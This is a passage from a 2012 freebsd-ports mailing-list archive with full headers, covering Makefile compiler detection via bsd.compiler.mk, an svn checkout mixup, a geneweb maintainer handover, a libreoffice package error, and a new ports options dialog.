freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 17:51:28 -0000 On 2012/11/30 01:46, Nikolai Lifanov wrote: > On 11/29/2012 10:12 AM, Alberto Villa wrote:> On Tue, Nov 27, 2012 at > 5:27 PM, Tobias Rehbein wrote: > >> Is there any chance you turn this into a generic Mk macro? > > > > I don't think so, it would mean running `cc --version` on every > > bsd.port.mk inclusion. > > -- > > Alberto Villa, FreeBSD committer > > http://people.FreeBSD.org/~avilla > > > > What I meant is to add something like a "setcc" target that port > Makefiles (that need this) can call. > > This logic: > > setcc: > > @if [ ! -z "`cc -v 2>&1|grep clang`" ] ; then \ > CC?= clang; \ > else \ > CC?= gcc; \ > fi > > Or this logic: > > setcc: > > @if [ -z "$CC" ] ; then \ > CC=`cc -v 2>&1|\ > sed '/version/!d;s/.*\(clang\).*/\1/;s/.*\(gcc\).*/\1/'` > fi > Your logic is broken. When CC=cc, no effect. I wrote Mk/bsd.compiler.mk based on share/mk/bsd.compiler.mk .if !defined(COMPILER_TYPE) . if ${CC:T:Mgcc*} COMPILER_TYPE:= gcc . elif ${CC:T:Mclang} COMPILER_TYPE:= clang . elif ${CC:T} == "cc" _COMPILER_VERSION!= ${CC} --version . if ${_COMPILER_VERSION:Mgcc} COMPILER_TYPE:= gcc . elif ${_COMPILER_VERSION:M\(GCC\)} COMPILER_TYPE:= gcc . elif ${_COMPILER_VERSION:Mclang} COMPILER_TYPE:= clang . endif . undef _COMPILER_VERSION . else COMPILER_TYPE:= ${CC:T} . endif .endif Include Mk/bsd.compiler.mk, and .if ${COMPILER_TYPE} == "clang" clang specific code .endif From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 19:04:19 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 039739C6 for ; Thu, 29 Nov 2012 19:04:19 +0000 (UTC) (envelope-from jeffreybouquet@yahoo.com) Received: from nm31-vm8.bullet.mail.gq1.yahoo.com (nm31-vm8.bullet.mail.gq1.yahoo.com [98.136.216.215]) by mx1.freebsd.org (Postfix) with ESMTP id A1CD88FC15 for ; Thu, 29 Nov 2012 19:04:18 +0000 (UTC) Received: from [98.137.12.57] by nm31.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 19:04:12 -0000 Received: from [98.137.12.251] by tm2.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 19:04:12 -0000 Received: from [127.0.0.1] by omp1059.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 19:04:11 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 978710.8466.bm@omp1059.mail.gq1.yahoo.com Received: (qmail 47420 invoked by uid 60001); 29 Nov 2012 19:04:08 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1354215848; bh=Qz55WoFoGHkv9Z65pgZF+yCpulCMTMPsoboWzR9C62o=; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=YNWzMoqO3AV4jmdRwNzHEFSZrPuHnkZ/tJr/aBJfRUN8Y2n9a2DOPXqtrk7OWfmTZpjzKR4a0yJu2P76v+PGMsawPOqYu+ioRZ1qFJgWxN0qhmvbjLk+8on3VqSoB9QDkWJ/JH6F5Obx4Q9//OqCbVQ9mpwitkGnseC777bWu+U= DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=xKCVL1goPE60sINvYb6j+NVfQHM7bTrhIdCaZ4KI+DDcIPe/Nllso9VMAopjAbQZK/kI+vk0iDPv5toHjAhMZ0h0nIOUE28IEu1I3DrAlcuFvxCMMTEmGCk+tO0v2YbpALL3WU+UWBGhUXZtDuWcM6ncpf2HwbgwgxgkGKyrbII=; X-YMail-OSG: XUnEUzkVM1ltRLq2Z9WpqKLtNYxr03i4OZQIp_v6_sdUv39 Y8vaZ83L6VbT0L2x6bbpPjkjKgNeJB3qzSzpdQcIoaFkQiYDakqe31NwpNUv 0Yzw0lXeBKPJ390K0TgFVir.9lOXmnovfFNEljZAqczC22gAmRZYE_e95vwp q9AxHZZAkE7WQbM_AyCse77aFBM2Fd_eLoXz7ca7kIGKMeKA4o.sQwCyej2u _s58Iuj_t4fp1Kv8qumfHY1cnQhbXAHMdgpul1IvX.8veIrg7YUpJCAU0Tyg lf2UdfygXEPlORm3zfiUIAo91ovTwNUVrYS7w1w4b2qg6VwDjxKZiDtjkvg1 SXLCbVAhx8fjGc4mM9AACk_6KNBr6vrdEHuFyqhG1gAX6fotL_h0i5NZD1gf s0mu49weDJQhjfNm4ChQL4E8swr5SCCDbU5U1LTmMt.eLth54nnv9BLjav1u B7e78TDB1Q7PF_3W0O5vXDWUYeHnzLgzwKCGI47K7TYnQS4ByKFX8UV_Lopt zPjnGzYY- Received: from [66.92.43.99] by web164006.mail.gq1.yahoo.com via HTTP; Thu, 29 Nov 2012 11:04:08 PST X-Rocket-MIMEInfo: 001.001, DQoNCi0tLSBPbiBUaHUsIDExLzI5LzEyLCBXYXJyZW4gQmxvY2sgPHdibG9ja0B3b25raXR5LmNvbT4gd3JvdGU6DQoNCkZyb206IFdhcnJlbiBCbG9jayA8d2Jsb2NrQHdvbmtpdHkuY29tPg0KU3ViamVjdDogUmU6IC9hcmNoaXZlcnMvIGlzIG1pc3NpbmcgYWZ0ZXIgc3ZuLi4uDQpUbzogIkplZmZyZXkgQm91cXVldCIgPGplZmZyZXlib3VxdWV0QHlhaG9vLmNvbT4NCkNjOiBmcmVlYnNkLXBvcnRzQGZyZWVic2Qub3JnDQpEYXRlOiBUaHVyc2RheSwgTm92ZW1iZXIgMjksIDIwMTIsIDc6MDAgQU0NCg0KT24BMAEBAQE- X-Mailer: YahooMailClassic/15.0.8 YahooMailWebService/0.8.127.475 Message-ID: <1354215848.37744.YahooMailClassic@web164006.mail.gq1.yahoo.com> Date: Thu, 29 Nov 2012 11:04:08 -0800 (PST) From: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 19:04:19 -0000 --- On Thu, 11/29/12, Warren Block wrote: From: Warren Block Subject: Re: /archivers/ is missing after svn... To: "Jeffrey Bouquet" Cc: freebsd-ports@freebsd.org Date: Thursday, November 29, 2012, 7:00 AM On Thu, 29 Nov 2012, Jeffrey Bouquet wrote: > UPDATE: > > OTOH I can svn it independently to elsewhere than ports, any canonical wa= y > to move that /tmp/archivers to /usr/ports/archivers ? > > DONE: > moved that /tmp/archivers to /usr/ports/archivers, strangely I did not fi= nd its > .svn after the move. Multiple partial checkouts is not the same as one big checkout.=A0 The=20 .svn directory only exists in the base directory of the checkout. Back up /usr/ports (for local changes), delete the entire directory,=20 then check out the entire directory. _______________________________________________ Done. Unfortunately I forgot to relocate /packages/ and /distfiles/ first, so they have been restored from yesterday's backup. Also there is an INDEX-9.move_distfiles=A0 (zero length file) for the next time, as a reminder, as I'd move INDEX* out of the way first. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 19:48:02 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 7EE3D8F2 for ; Thu, 29 Nov 2012 19:48:02 +0000 (UTC) (envelope-from tobias.rehbein@web.de) Received: from mout.web.de (mout.web.de [212.227.15.4]) by mx1.freebsd.org (Postfix) with ESMTP id 068828FC16 for ; Thu, 29 Nov 2012 19:48:01 +0000 (UTC) Received: from oshi.local ([78.46.133.223]) by smtp.web.de (mrweb001) with ESMTPSA (Nemesis) id 0MNc1S-1TbNqb3l62-007Img; Thu, 29 Nov 2012 20:47:08 +0100 Received: from oshi.local (localhost [127.0.0.1]) by oshi.local (8.14.5/8.14.5) with ESMTP id qATJl3pn003703; Thu, 29 Nov 2012 20:47:06 +0100 (CET) (envelope-from tobi@oshi.local) Received: (from tobi@localhost) by oshi.local (8.14.5/8.14.5/Submit) id qATJl1wB003702; Thu, 29 Nov 2012 20:47:01 +0100 (CET) (envelope-from tobi) Date: Thu, 29 Nov 2012 20:47:01 +0100 From: Tobias Rehbein To: Yamaya Takashi Subject: Re: How to handle WITH_CLANG_IS_CC in ports Message-ID: <20121129194701.GA3017@oshi.local> References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> <50B7916E.4070102@mail.lifanov.com> <50B7A0A3.8030604@kbh.biglobe.ne.jp> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable In-Reply-To: <50B7A0A3.8030604@kbh.biglobe.ne.jp> User-Agent: Mutt/1.5.21 (2010-09-15) X-Provags-ID: V02:K0:qqd/2xUpehm+MIwFAHrTecoHwOmVIuef6ni4IfgK/UT tCZrkgLQSHTtSZ1Xzol7VlZMR0yT/gyrh5yG2F8LGWuWS54yOC 2cetpqb1sesXDQW+rs+/UAJN9YIjeohgM9BPncUCgi8XPVVkOU 4M0ioBR4BcY9Fb1TTIg++3BueADWGq6HL6unlzaWSp3Tmv6svl 1R0S14Af/TltUv9jt+fpA== Cc: Nikolai Lifanov , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 19:48:02 -0000 Am Fri, Nov 30, 2012 at 02:51:31AM +0900 schrieb Yamaya Takashi: >=20 > Include Mk/bsd.compiler.mk, and > .if ${COMPILER_TYPE} =3D=3D "clang" > clang specific code > .endif >=20 Thanks. This is exactly what I was looking for. It is available in CURRENT only though. I will tackle the build issue using this information this weekend. Regards, Tobias From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 21:30:29 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 2EEEB285 for ; Thu, 29 Nov 2012 21:30:29 +0000 (UTC) (envelope-from dim@FreeBSD.org) Received: from tensor.andric.com (tensor.andric.com [87.251.56.140]) by mx1.freebsd.org (Postfix) with ESMTP id D98F48FC13 for ; Thu, 29 Nov 2012 21:30:28 +0000 (UTC) Received: from [IPv6:2001:7b8:3a7:0:7ce7:996c:e955:4ab6] (unknown [IPv6:2001:7b8:3a7:0:7ce7:996c:e955:4ab6]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by tensor.andric.com (Postfix) with ESMTPSA id 51C6A5C37; Thu, 29 Nov 2012 22:30:27 +0100 (CET) Message-ID: <50B7D3F7.4020201@FreeBSD.org> Date: Thu, 29 Nov 2012 22:30:31 +0100 From: Dimitry Andric Organization: The FreeBSD Project User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Tobias Rehbein Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> <50B7916E.4070102@mail.lifanov.com> <50B7A0A3.8030604@kbh.biglobe.ne.jp> <20121129194701.GA3017@oshi.local> In-Reply-To: <20121129194701.GA3017@oshi.local> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: Nikolai Lifanov , freebsd-ports@freebsd.org, Yamaya Takashi X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 21:30:29 -0000 On 2012-11-29 20:47, Tobias Rehbein wrote:> Am Fri, Nov 30, 2012 at 02:51:31AM +0900 schrieb Yamaya Takashi: >> >> Include Mk/bsd.compiler.mk, and >> .if ${COMPILER_TYPE} == "clang" >> clang specific code >> .endif >> > > Thanks. This is exactly what I was looking for. It is available in > CURRENT only though. FYI, I merged bsd.compiler.mk and the rest of the COMPILER_TYPE logic to stable/9 in r243041. It will not be in 9.1-RELEASE, though... From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 22:46:32 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 201EA6D; Thu, 29 Nov 2012 22:46:32 +0000 (UTC) (envelope-from yamayan@kbh.biglobe.ne.jp) Received: from rcpt-expgw.biglobe.ne.jp (rcpt-expgw.biglobe.ne.jp [IPv6:2001:260:401:16::1]) by mx1.freebsd.org (Postfix) with ESMTP id 7E06A8FC15; Thu, 29 Nov 2012 22:46:31 +0000 (UTC) Received: from vc-gw.biglobe.ne.jp by rcpt-expgw.biglobe.ne.jp (shby/5910021009) with SMTP id qATMkTg9025133; Fri, 30 Nov 2012 07:46:29 +0900 Received: from smtp-gw.biglobe.ne.jp ([172.21.175.156]) by vc-gw.biglobe.ne.jp (kbkr/0716090908) with ESMTP id qATMkTqY005847; Fri, 30 Nov 2012 07:46:29 +0900 X-Biglobe-Sender: Received: from [192.168.0.100] (KD027083060020.ppp-bb.dion.ne.jp [27.83.60.20]) by smtp-gw.biglobe.ne.jp id HAGDAC15AFDC; Fri, 30 Nov 2012 07:46:29 +0900 (JST) Message-ID: <50B7E5CC.70203@kbh.biglobe.ne.jp> Date: Fri, 30 Nov 2012 07:46:36 +0900 From: Yamaya Takashi User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Dimitry Andric Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> <50B7916E.4070102@mail.lifanov.com> <50B7A0A3.8030604@kbh.biglobe.ne.jp> <20121129194701.GA3017@oshi.local> <50B7D3F7.4020201@FreeBSD.org> In-Reply-To: <50B7D3F7.4020201@FreeBSD.org> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: Tobias Rehbein , Nikolai Lifanov , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 22:46:32 -0000 On 2012/11/30 06:30, Dimitry Andric wrote: > On 2012-11-29 20:47, Tobias Rehbein wrote:> Am Fri, Nov 30, 2012 at > 02:51:31AM +0900 schrieb Yamaya Takashi: >>> >>> Include Mk/bsd.compiler.mk, and >>> .if ${COMPILER_TYPE} == "clang" >>> clang specific code >>> .endif >>> >> >> Thanks. This is exactly what I was looking for. It is available in >> CURRENT only though. > > FYI, I merged bsd.compiler.mk and the rest of the COMPILER_TYPE logic to > stable/9 in r243041. It will not be in 9.1-RELEASE, though... > I am NOT committer. Please commit Mk/bsd.compiler.mk. [usr/ports/]Mk/bsd.compiler.mk is differ from [usr/src/]share/mk/bsd.compiler.mk. Ports version accepts another compiler, e.g. CC=icc, but Base version not. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 07:06:33 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 911C2FDD for ; Fri, 30 Nov 2012 07:06:33 +0000 (UTC) (envelope-from alex@stangl.us) Received: from stangl.us (stangl.us [66.93.193.95]) by mx1.freebsd.org (Postfix) with ESMTP id 59FD58FC08 for ; Fri, 30 Nov 2012 07:06:33 +0000 (UTC) Received: from scout.stangl.us (localhost [127.0.0.1]) by scout.stangl.us (Postfix) with ESMTP id 4FC0F1704D for ; Fri, 30 Nov 2012 00:59:23 -0600 (CST) X-Virus-Scanned: amavisd-new at stangl.us Received: from stangl.us ([127.0.0.1]) by scout.stangl.us (scout.stangl.us [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 52s8CyivCfNx for ; Fri, 30 Nov 2012 00:59:14 -0600 (CST) Received: by scout.stangl.us (Postfix, from userid 1001) id 8BDEE1704A; Fri, 30 Nov 2012 00:59:14 -0600 (CST) Date: Fri, 30 Nov 2012 00:59:14 -0600 From: Alex Stangl To: freebsd-ports@freebsd.org Subject: Broken www/geneweb port Message-ID: <20121130065914.GA46955@scout.stangl.us> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.21 (2010-09-15) X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 07:06:33 -0000 Hi, I see www/geneweb has been broken for some time now. GeneWeb 5.02 has some compatibility issues with the latest camlp5 library. I could see what needed to be patched to fix the problem, however a better fix would be from upstream. So I have been communicating with the current GeneWeb maintainer, fabien@geneanet.org, on the GeneWeb mailing list, and it appears this problem is resolved in the newer GeneWeb versions, e.g., 6.05. The versions since fabien has taken over development are hosted on http://opensource.geneanet.org/projects/geneweb If nobody else is interested in maintaining this port, I'd like to take it over and submit patches to switchover to the newer version hosted at the site listed above. Thanks, Alex From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 07:34:51 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 604757A0 for ; Fri, 30 Nov 2012 07:34:51 +0000 (UTC) (envelope-from bsdkaffee@gmail.com) Received: from mail-vc0-f176.google.com (mail-vc0-f176.google.com [209.85.220.176]) by mx1.freebsd.org (Postfix) with ESMTP id 04D7C8FC08 for ; Fri, 30 Nov 2012 07:34:50 +0000 (UTC) Received: by mail-vc0-f176.google.com with SMTP id fl13so19089173vcb.35 for ; Thu, 29 Nov 2012 23:34:50 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=sender:from:to:cc:subject:date:message-id:user-agent:in-reply-to :references:mime-version:content-transfer-encoding:content-type; bh=iAWlXyGK2Ydhk1kfFA8TsFNRLxJaJpTSWm9uf47vfE0=; b=Hr+V/ImeFoOQ6KRZU0Cm98UDngHI+/tq19mcTwdnW48HJ3heGC+7L0Cb1bUp/GfFyk qqKTurtucxMPRuogOyVy+kR5N25lSRd4LlJQqU9DYWL3WBvAZoT/Fdz9Z173xwXlRl1a l+AS/sMbUPoR5m0KRqyXVWfS/1RzBB2DH/l1gD5YB1lmS00+c35CToN9Wdb0w32KeAK2 YKKnzbdioEXcr2x0sWgE9H1qUAwtzHh5BrB6GMgURhL+z6WkoxTlt6aJMatai4hSwV32 LimVar5lf3eJSoiQ1oCqatxp5JCyq9BKTHZmIj3gt1P6sAkHg8J+mO+ytE9lJuQ41BfI CLNQ== Received: by 10.52.176.168 with SMTP id cj8mr248177vdc.72.1354260566296; Thu, 29 Nov 2012 23:29:26 -0800 (PST) Received: from mocha.verizon.net (c-71-61-40-68.hsd1.oh.comcast.net. [71.61.40.68]) by mx.google.com with ESMTPS id n10sm1527280vde.9.2012.11.29.23.29.24 (version=TLSv1/SSLv3 cipher=OTHER); Thu, 29 Nov 2012 23:29:25 -0800 (PST) Sender: "Jason E. Hale" From: "Jason E. Hale" To: Alex Stangl Subject: Re: Broken www/geneweb port Date: Fri, 30 Nov 2012 02:29:23 -0500 Message-ID: <2012513.tHPeQGkhkC@mocha.verizon.net> User-Agent: KMail/4.8.4 (FreeBSD/9.0-RELEASE-p3; KDE/4.8.4; i386; ; ) In-Reply-To: <20121130065914.GA46955@scout.stangl.us> References: <20121130065914.GA46955@scout.stangl.us> MIME-Version: 1.0 Content-Transfer-Encoding: 7Bit Content-Type: text/plain; charset="us-ascii" Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 07:34:51 -0000 On Friday, November 30, 2012 00:59:14 Alex Stangl wrote: > If nobody else is interested in maintaining this port, I'd like to take > it over and submit patches to switchover to the newer version hosted at > the site listed above. I've listed you as the new maintainer of www/geneweb. Thanks for volunteering! -- Jason E. Hale - jhale@ FreeBSD Ports Committer KDE/FreeBSD Team From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 07:45:02 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 83283AED for ; Fri, 30 Nov 2012 07:45:02 +0000 (UTC) (envelope-from freebsd-ports@m.gmane.org) Received: from plane.gmane.org (plane.gmane.org [80.91.229.3]) by mx1.freebsd.org (Postfix) with ESMTP id 3687C8FC12 for ; Fri, 30 Nov 2012 07:45:01 +0000 (UTC) Received: from list by plane.gmane.org with local (Exim 4.69) (envelope-from ) id 1TeLHV-0000FD-0K for freebsd-ports@freebsd.org; Fri, 30 Nov 2012 08:45:09 +0100 Received: from 79-139-19-75.prenet.pl ([79.139.19.75]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Fri, 30 Nov 2012 08:45:04 +0100 Received: from jb.1234abcd by 79-139-19-75.prenet.pl with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Fri, 30 Nov 2012 08:45:04 +0100 X-Injected-Via-Gmane: http://gmane.org/ To: freebsd-ports@freebsd.org From: jb Subject: editors/libreoffice =?utf-8?b?cGtnX2FkZA==?= error Date: Fri, 30 Nov 2012 07:41:34 +0000 (UTC) Lines: 18 Message-ID: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Complaints-To: usenet@ger.gmane.org X-Gmane-NNTP-Posting-Host: sea.gmane.org User-Agent: Loom/3.14 (http://gmane.org/) X-Loom-IP: 79.139.19.75 (Mozilla/5.0 (X11; FreeBSD i386; rv:9.0.1) Gecko/20100101 Firefox/9.0.1) X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 07:45:02 -0000 Hi, what is this error about ? # pkg_add -r libreoffice Fetching ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-9.0-release/Latest /libreoffice.tbz...lib/libreoffice/basis3.4/program/libunopkgapp.so: bzip decompression failed tar: Error exit delayed from previous errors. Done. # ctl-c to abort http://www.freebsd.org/cgi/query-pr.cgi?pr=173965 jb From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 07:53:53 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 041D0CFD; Fri, 30 Nov 2012 07:53:53 +0000 (UTC) (envelope-from ruM1cRO@yandex.ru) Received: from forward4h.mail.yandex.net (forward4h.mail.yandex.net [IPv6:2a02:6b8:0:f05::4]) by mx1.freebsd.org (Postfix) with ESMTP id 3219F8FC08; Fri, 30 Nov 2012 07:53:52 +0000 (UTC) Received: from web8h.yandex.ru (web8h.yandex.ru [84.201.186.37]) by forward4h.mail.yandex.net (Yandex) with ESMTP id 2D9061B21213; Fri, 30 Nov 2012 11:53:48 +0400 (MSK) Received: from 127.0.0.1 (localhost.localdomain [127.0.0.1]) by web8h.yandex.ru (Yandex) with ESMTP id 473AB1AD804B; Fri, 30 Nov 2012 11:53:47 +0400 (MSK) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yandex.ru; s=mail; t=1354262027; bh=3BWCYFsLgXULNFqznW2nqzUWvlY5wNYYTpCLiwjDtuM=; h=From:To:Cc:In-Reply-To:References:Subject:Date; b=xAwPOfasjzS0XRA/YfET/nF+MHm8zHUbI4wOS0AkDxI6CdcocsV4gDIV4EAQhYWjm 1HVlVaYxWLiMXaNLesj0wSKZgR4aMVZbTiUjq2GRKTu3JK6HbOde7d4xKb32CDuUH+ vcDEDB4idaAE/0TcP3iTEeFAsfYwNQIjF9cx2E00= Received: from owa.dbdc.luxoft.com (owa.dbdc.luxoft.com [213.208.171.196]) by web8h.yandex.ru with HTTP; Fri, 30 Nov 2012 11:53:46 +0400 From: Ilya A. Arkhipov To: Warren Block In-Reply-To: References: <695411354194775@web5g.yandex.ru> Subject: Re: Discussion concerning: New dialog for ports MIME-Version: 1.0 Message-Id: <506511354262026@web8h.yandex.ru> X-Mailer: Yamail [ http://yandex.ru ] 5.0 Date: Fri, 30 Nov 2012 11:53:46 +0400 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=koi8-r Cc: "kwm@freebsd.org" , "bapt@freebsd.org" , Eitan Adler , Alexey Dokuchaev , "freebsd-ports@freebsd.org" X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 07:53:53 -0000 29.11.2012, 19:18, "Warren Block" : > On Thu, 29 Nov 2012, Ilya A. Arkhipov wrote: > >> šFew week ago I started work on new dialog for ports, main idea it's >> šadding functionality, I guess you know ;) I took checklist.c from >> šlibdialog and modified it for us. Regarding license, I discussed with >> šThomas E. Dickey(author dialog) he said I can't change LGPL to BSD but >> šit should not be a problem. >> šWhat we have now: >> š- check + radio lists in on box (and yes we can put off radiobox) >> š- separate line with text >> š- dynamic width/height size > > Sounds familiar. :) šTwo lines for text would be good. Yeah, I started from eadler@ email :) Regarding 2 lines, maybe it will be added in future but not now. Now you can use statusbar for providing more information. I mean: http://imm.io/NqQh > >> š- all features from checklist.c :) >> š-- mouse support >> š-- hotkey for find a lines >> šMy plan: >> š- add Help button/F1/alt-h/esc-1 (actually don't know how will be better) >> š- button for license > > Might want to call that "Port License" or such. šOtherwise, it looks > like it will show the license of the dialog program. looks correct. > >> š- fixing bugs >_< >> š- start work on parsing receiving data, after that should be ready for testing. >> >> šRegarding parsing data I want discuss here. Wanna correct understand what will be better, now I have few variants: >> š1. Get all data from env. variables >> š2. Use the same with old dialog style, I mean receive from STDIN >> š3. From file? <- guess bad idea >> šYour ideas? >> >> šAnd certainly screeshots: >> šBig description(just for test); >> ššIn X -- http://imm.io/NkVR >> ššIn Terminal -- https://www.dropbox.com/s/bzt8zszpk40jrso/2012-11-29%2014.59.53.jpg >> šWith license button: >> ššin X -- http://imm.io/Nl9K >> >> šYou can find my repo there: https://bitbucket.org/m1cro/d4p/. I'll be happy for all response ;) > > Thanks for working on this! -- With Best Regards, Ilya A. Arkhipov From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 08:17:22 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 856152AC for ; Fri, 30 Nov 2012 08:17:22 +0000 (UTC) (envelope-from lars@e-new.0x20.net) Received: from mail.0x20.net (mail.0x20.net [217.69.76.211]) by mx1.freebsd.org (Postfix) with ESMTP id 37CC28FC12 for ; Fri, 30 Nov 2012 08:17:21 +0000 (UTC) Received: from e-new.0x20.net (mail.0x20.net [IPv6:2001:aa8:fffb:1::3]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by mail.0x20.net (Postfix) with ESMTPS id 346866A6000; Fri, 30 Nov 2012 09:17:20 +0100 (CET) Received: from e-new.0x20.net (localhost [127.0.0.1]) by e-new.0x20.net (8.14.5/8.14.5) with ESMTP id qAU8HJBd084420; Fri, 30 Nov 2012 09:17:19 +0100 (CET) (envelope-from lars@e-new.0x20.net) Received: (from lars@localhost) by e-new.0x20.net (8.14.5/8.14.5/Submit) id qAU8HJrg083710; Fri, 30 Nov 2012 09:17:19 +0100 (CET) (envelope-from lars) Date: Fri, 30 Nov 2012 09:17:19 +0100 From: Lars Engels To: "Ilya A. Arkhipov" Subject: Re: Discussion concerning: New dialog for ports Message-ID: <20121130081719.GA96785@e-new.0x20.net> References: <695411354194775@web5g.yandex.ru> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline In-Reply-To: <695411354194775@web5g.yandex.ru> X-Editor: VIM - Vi IMproved 7.3 X-Operation-System: FreeBSD 8.3-RELEASE-p4 User-Agent: 